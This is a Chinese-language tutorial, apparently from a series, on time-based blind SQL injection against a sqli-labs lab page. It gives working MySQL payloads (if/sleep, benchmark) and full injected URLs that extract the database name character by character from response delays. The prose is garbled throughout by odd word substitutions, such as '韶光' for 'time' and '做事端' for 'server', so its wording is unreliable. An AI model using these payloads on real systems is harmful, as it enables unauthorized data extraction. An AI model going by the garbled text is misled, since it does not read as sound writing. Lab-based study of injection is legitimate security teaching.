还是参考前两篇的格式,先先容下基于韶光盲注时可能会用到的句式
1)if( ascii( substr( database(),1,1 ) ) > 115, 0 , sleep(5)) :if判断,条件不成立时实行sleep(5),即休眠5秒
2)benchmark(loop_count, expression):即实行expression一共loop_count次,benchmark()的返回值总是0,但是mysql客户端会打印一行来输出语句的大概实行韶光
不同数据库可利用的方法
测试案例
下面直接看案例,还是前两篇内容的demo,在前面内容我们知道,当实行成功时,页面显示you are in...,实行失落败时显示空缺
1) 测试当前数据库的第一位字符的ASCII码与115进行比较,大于115成立的话相应正常,否则实行sleep(5),即休眠5秒
http://192.168.102.135/ctf/sqli/Less-5/index.php?id=1' and if(ascii(substr(database(),1,1))>115,1,sleep(5))--+
通过下图可以看出,做事端相应了6秒,即实行了sleep(5),解释判断不成立
连续测试下面语句,创造做事端相应1秒正常,解释前面if条件成立,即当前数据库的第一位字符的ASCII码为115(对应字符为s)
http://192.168.102.135/ctf/sqli/Less-5/index.php?id=1' and if(ascii(substr(database(),1,1))=115,1,sleep(5))--+
进一步布局逻辑判断遍历就可以获取其它任意信息,跟前面的布尔盲注测试思路类似
小结本节内容相对上一节就很好理解了,核心思想便是布局payload通过做事端相应韶光来判断语句是否成立
